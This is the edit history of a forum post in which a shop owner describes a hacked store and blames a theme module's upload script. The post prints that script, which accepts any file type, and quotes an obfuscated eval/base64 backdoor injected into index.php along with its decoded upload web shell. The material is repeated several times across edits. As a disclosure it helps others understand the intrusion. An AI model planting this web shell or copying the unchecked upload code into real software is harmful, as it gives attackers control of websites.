Jump to content

Edit History

TiaNex Shopping

TiaNex Shopping

 

 

it's very possible the web shell file was upload from some modules of supershop theme,

i also installed kuteshop theme,

unlucky, the hacker deleted all my website files,

 

nearly we can make sure the back door file php file to get web shell was upload from

 \modules\verticalmegamenus\VerticalMegaMenusUploadImage.php

the code with Serious security problem

it doesn't verify the file types and audit the permission at all,

i bought this theme,but it ruin my store !

  

<?php
require_once(dirname(__FILE__).'../../../config/config.inc.php');
require_once(dirname(__FILE__).'../../../init.php');
require_once(dirname(__FILE__).'/verticalmegamenus.php');
$tempPath = _PS_MODULE_DIR_.'verticalmegamenus/images/temps/';
$fileName = $_FILES["uploadimage"]["name"];
$pathFile = $tempPath.$fileName;
if(($_FILES["uploadimage"]["size"] > 1000000)){
	echo "File size is greater than 1MB";
}else{
	if (@move_uploaded_file($_FILES['uploadimage']['tmp_name'], $pathFile)) {		
	  	echo $fileName; 
	}else {
		echo "File upload failed.";
	}	
}
?>

 

 

 

one the web shell back door file,

the index.php was modified with these code at the begin of the file 

<?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){
    $func="cr"."ea"."te_"."fun"."ction";
    $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
    $x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg==");
    exit;}?><?php

after decode 

<?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>Done! Open</a></h1>";
    }
}echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="UPload"></form></body></html>';
?>

 

TiaNex Shopping

TiaNex Shopping

 

 

it's very possible the web shell file was upload from some modules of supershop theme,

i also installed kuteshop theme,

unlucky, the hacker deleted all my website files,

 

nearly we can make sure the back door file php file to get web shell was upload from

 \modules\verticalmegamenus\VerticalMegaMenusUploadImage.php

the code with Serious security problem

it doesn't verify the file types and audit the permission at all,

i bought this theme,but it ruin my store !

  

<?php
require_once(dirname(__FILE__).'../../../config/config.inc.php');
require_once(dirname(__FILE__).'../../../init.php');
require_once(dirname(__FILE__).'/verticalmegamenus.php');
$tempPath = _PS_MODULE_DIR_.'verticalmegamenus/images/temps/';
$fileName = $_FILES["uploadimage"]["name"];
$pathFile = $tempPath.$fileName;
if(($_FILES["uploadimage"]["size"] > 1000000)){
	echo "File size is greater than 1MB";
}else{
	if (@move_uploaded_file($_FILES['uploadimage']['tmp_name'], $pathFile)) {		
	  	echo $fileName; 
	}else {
		echo "File upload failed.";
	}	
}
?>

 

 

 

one the web shell back door file,

the index.php was modified with these code at the begin of the file 

<?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){
    $func="cr"."ea"."te_"."fun"."ction";
    $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
    $x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg==");
    exit;}?><?php

 

TiaNex Shopping

TiaNex Shopping

the index.php was modified with these code at the begin of the file

 

it's very possible the web shell file was upload from some modules of supershop theme,

i also installed kuteshop theme,

unlucky, the hacker deleted all my website files,

 

nearly we can make sure the web shell php file was upload from

 \modules\verticalmegamenus\VerticalMegaMenusUploadImage.php

the code with Serious security problem

it doesn't verify the file types and audit the permission at all,

  

<?php
require_once(dirname(__FILE__).'../../../config/config.inc.php');
require_once(dirname(__FILE__).'../../../init.php');
require_once(dirname(__FILE__).'/verticalmegamenus.php');
$tempPath = _PS_MODULE_DIR_.'verticalmegamenus/images/temps/';
$fileName = $_FILES["uploadimage"]["name"];
$pathFile = $tempPath.$fileName;
if(($_FILES["uploadimage"]["size"] > 1000000)){
	echo "File size is greater than 1MB";
}else{
	if (@move_uploaded_file($_FILES['uploadimage']['tmp_name'], $pathFile)) {		
	  	echo $fileName; 
	}else {
		echo "File upload failed.";
	}	
}
?>

 

 

 

 

  

<?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){
    $func="cr"."ea"."te_"."fun"."ction";
    $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
    $x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg==");
    exit;}?><?php

 

TiaNex Shopping

TiaNex Shopping

the index.php was modified with these code at the begin of the file

 

it's very possible the web shell file was upload from some modules of supershop theme,

i also installed kuteshop theme,

unlucky, the hacker deleted all my website files,

 

  

<?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){
    $func="cr"."ea"."te_"."fun"."ction";
    $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
    $x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg==");
    exit;}?><?php

 

TiaNex Shopping

TiaNex Shopping

the index.php was modified with these code at the begin of the file

 

it's very possible the web shell file was upload from some modules of supershop theme,

i also installed kuteshop theme,

unlucky, the hacker deleted all my website files,

 

  

<?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){
    $func="cr"."ea"."te_"."fun"."ction";
    $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
    $x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg==");
    exit;}?><?php

 

TiaNex Shopping

TiaNex Shopping

the index.php was modified with these code at the begin of the file

 

it's very possible the web shell file was upload from some modules of supershop theme,

i also installed kuteshop theme,

unlucky, the hacker deleted all my website files,

 

  

<?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){
    $func="cr"."ea"."te_"."fun"."ction";
    $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
    $x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg==");
    exit;}?><?php

 

TiaNex Shopping

TiaNex Shopping

the index.php was modified with these code at the begin of the file

  

<?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){
    $func="cr"."ea"."te_"."fun"."ction";
    $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
    $x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg==");
    exit;}?><?php

 

×
×
  • Create New...